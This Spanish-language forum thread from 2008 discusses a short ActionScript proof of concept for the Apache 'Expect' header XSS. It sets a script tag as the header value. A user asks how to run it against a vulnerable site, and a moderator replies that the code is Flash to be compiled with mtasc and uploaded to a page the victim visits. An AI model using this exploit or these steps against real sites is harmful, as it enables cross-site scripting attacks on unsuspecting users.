elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Usando Git para manipular el directorio de trabajo, el índice y commits (segunda parte)


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking
| | |-+  Bugs y Exploits
| | | |-+  Nivel Web (Moderadores: sirdarckcat, WHK)
| | | | |-+  Duda exploit Apache Expect XSS
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Duda exploit Apache Expect XSS  (Leído 4,808 veces)
& eDu &


Desconectado Desconectado

Mensajes: 580



Ver Perfil
Duda exploit Apache Expect XSS
« en: 18 Mayo 2008, 12:08 pm »

Bueno tengo este exploit
Código:
var req:LoadVars=new LoadVars();
req.addRequestHeader("Expect",
"<script>alert('gotcha!')</script>");
req.send("http://www.target.site/","_blank","GET");
y quiero explotarlo en una web vulnerable a el, pero no se como, si lo saben diganmelo. Gracias ;)
« Última modificación: 12 Agosto 2008, 16:42 pm por sirdarckcat » En línea

Azielito
no es
Colaborador
***
Desconectado Desconectado

Mensajes: 9.188


>.<


Ver Perfil WWW
Re: ¿Como lo ejecuto?
« Respuesta #1 en: 19 Mayo 2008, 18:59 pm »

Pues que sistema es ese?

a simple vista es una web hecha en AJAX y ese es codigo javascript, pos la puees ejecutar desde la barra de direcciones

Código
  1. javascript:var req:LoadVars=new LoadVars();req.addRequestHeader("Expect","<script>alert('gotcha!')</script>");req.send("http://www.target.site/","_blank","GET");
  2.  
  3.  

pero debes encontrar esa web vulnerable, de donde sacaste ese codigo?
o sea, pasa la url para ver para que sistema es xD
« Última modificación: 12 Agosto 2008, 16:41 pm por sirdarckcat » En línea

& eDu &


Desconectado Desconectado

Mensajes: 580



Ver Perfil
Re: ¿Como lo ejecuto?
« Respuesta #2 en: 19 Mayo 2008, 19:17 pm »

x.es
¿Que pongo en la url
www.x.es/javascript:var req:LoadVars=new LoadVars();req.addRequestHeader("Expect","<script>alert('gotcha!')</script>");req.send("http://www.target.site/","_blank","GET")

?
« Última modificación: 19 Mayo 2008, 20:26 pm por Mojambalupe » En línea

Azielito
no es
Colaborador
***
Desconectado Desconectado

Mensajes: 9.188


>.<


Ver Perfil WWW
Re: ¿Como lo ejecuto?
« Respuesta #3 en: 19 Mayo 2008, 20:21 pm »

mmmhhh.. no, vas a tener que cargar el JS dara error por el ":" del var req:LoadVars ¬¬

Mirate los post pegados para que entiendas mejor de que se trata...

no recuerdo si hay info sobre eso xDD mejor lee lo que tenemos por aca
http://www.elhacker.net/jasildbg/



Tantes que leas algo mejor lee esto que te servira bastante

http://foro.elhacker.net/bugs_y_exploits/taller_introduccion_a_los_bugs_a_nivel_web-t173509.0.html

Cuando termines de leer este entonces sigues con este

https://foro.elhacker.net/bugs_y_exploits/taller_de_introduccion_a_bugsexploits_1deg-t103198.0.html

y ya luego lees el de jasildbg

:D
« Última modificación: 19 Mayo 2008, 20:33 pm por Azielito » En línea

sirdarckcat
Aspirante a supervillano
Moderador
***
Desconectado Desconectado

Mensajes: 7.029


No estoy loco, soy mentalmente divergente


Ver Perfil WWW
Re: ¿Como lo ejecuto?
« Respuesta #4 en: 20 Mayo 2008, 16:24 pm »

eso es flash jaja

compila ese codigo con mtasc, y subelo a una web que vea tu victima y yap :P
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Automatización a la hora de navegar con EXPECT
GNU/Linux
JonaLamper 2 2,637 Último mensaje 4 Junio 2013, 08:03 am
por RyogiShiki
Ayuda sobre apache, exploit y vulnerabilidades
Hacking
ElCondor1997 4 4,110 Último mensaje 6 Agosto 2013, 11:06 am
por darkvidhack
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines